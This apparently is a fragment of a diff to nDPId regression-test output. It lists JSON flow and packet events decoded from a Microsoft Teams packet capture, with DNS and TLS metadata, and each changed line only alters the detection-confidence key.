-00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1813,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685243,"flow_last_seen":1587041685256,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041685256,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1813,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685243,"flow_last_seen":1587041685256,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041685256,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1814,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1587041685261,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685261,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0jN1AAG0Ge5k0cg8twKgBBgG77IfA1AaRAv0Ol4AS\/\/+iigAAAgQFoAEDAwgBAQQC"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1815,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1587041685261,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041685261,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGNYPAqAEGNHIPLeyHAbsC\/Q6XwNQGklAQIADDSQAA"} -00990{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1816,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685106,"flow_last_seen":1587041685262,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1587041685262,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"trouter2-asse-a.trouter.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01338{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1824,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041685240,"flow_last_seen":1587041685269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6122,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1587041685269,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","server_names":"*.config.teams.microsoft.com,config.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"7d8fd34fdb13a7fff30d5a52846b6c4c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=config.teams.microsoft.com","fingerprint":"B9:54:54:12:C9:E9:43:65:10:70:04:7B:AD:B6:0C:46:06:38:A5:FA"}} +00990{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1816,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685106,"flow_last_seen":1587041685262,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1587041685262,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"trouter2-asse-a.trouter.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01338{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1824,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041685240,"flow_last_seen":1587041685269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6122,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1587041685269,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","server_names":"*.config.teams.microsoft.com,config.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"7d8fd34fdb13a7fff30d5a52846b6c4c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=config.teams.microsoft.com","fingerprint":"B9:54:54:12:C9:E9:43:65:10:70:04:7B:AD:B6:0C:46:06:38:A5:FA"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1828,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1587041685278,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041685278,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8aa1AAGwGYc00ck0hwKgBBgG77IgacWa+co2TlKASIABIJQAAAgQFoAEDAwgEAggKYR7cGTCEuUo="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1829,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1587041685278,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685278,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyIAbtyjZOUGnFmv4AQEAmGrAAAAQEICjCEuXNhHtwZ"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1830,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685232,"flow_last_seen":1587041685278,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041685278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1830,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685232,"flow_last_seen":1587041685278,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041685278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1833,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1587041685280,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041685280,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8VD9AAGwGx0kofgkHwKgBBgG77IwJMzAcxeiHxqASIADLBQAAAgQFoAEDAwgEAggKUkq4VzCEuV0="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1834,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1587041685280,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685280,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR5HAqAEGKH4JB+yMAbvF6IfGCTMwHYAQEAkJnwAAAQEICjCEuXRSSrhX"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1835,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685251,"flow_last_seen":1587041685281,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041685281,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1835,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685251,"flow_last_seen":1587041685281,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041685281,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1841,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1587041685294,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041685294,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8VA1AAGwGd200ck0hwKgBBgG77IvHJo2qMLP5JqASIAAqDQAAAgQFoAEDAwgEAggKYR8CxDCEuVo="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1842,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1587041685294,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685294,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyLAbsws\/kmxyaNq4AQEAlolwAAAQEICjCEuYBhHwLE"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1843,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685248,"flow_last_seen":1587041685294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1587041685294,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1864,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041685232,"flow_last_seen":1587041685327,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041685327,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} -01503{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1874,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685248,"flow_last_seen":1587041685350,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6269,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1587041685350,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1843,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685248,"flow_last_seen":1587041685294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1587041685294,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1846,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041685251,"flow_last_seen":1587041685312,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1686,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1587041685312,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1864,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041685232,"flow_last_seen":1587041685327,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041685327,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +01503{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1874,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685248,"flow_last_seen":1587041685350,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6269,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1587041685350,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1897,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041685406} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":1897,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041685403,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -01378{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1908,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685106,"flow_last_seen":1587041685420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6165,"flow_avg_l4_payload_len":560,"midstream":0,"thread_ts_msec":1587041685420,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"trouter2-asse-a.trouter.teams.microsoft.com","server_names":"*.trouter.teams.microsoft.com,go.trouter.io,*.drip.trouter.io,*.dc.trouter.io","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 2","subjectDN":"CN=*.trouter.teams.microsoft.com","fingerprint":"DD:24:DF:0E:F3:63:CC:10:B5:03:CF:34:EB:A5:14:8B:97:90:9B:D4"}} +01378{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1908,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685106,"flow_last_seen":1587041685420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6165,"flow_avg_l4_payload_len":560,"midstream":0,"thread_ts_msec":1587041685420,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"trouter2-asse-a.trouter.teams.microsoft.com","server_names":"*.trouter.teams.microsoft.com,go.trouter.io,*.drip.trouter.io,*.dc.trouter.io","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 2","subjectDN":"CN=*.trouter.teams.microsoft.com","fingerprint":"DD:24:DF:0E:F3:63:CC:10:B5:03:CF:34:EB:A5:14:8B:97:90:9B:D4"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1979,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041685611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":1979,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041685546,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 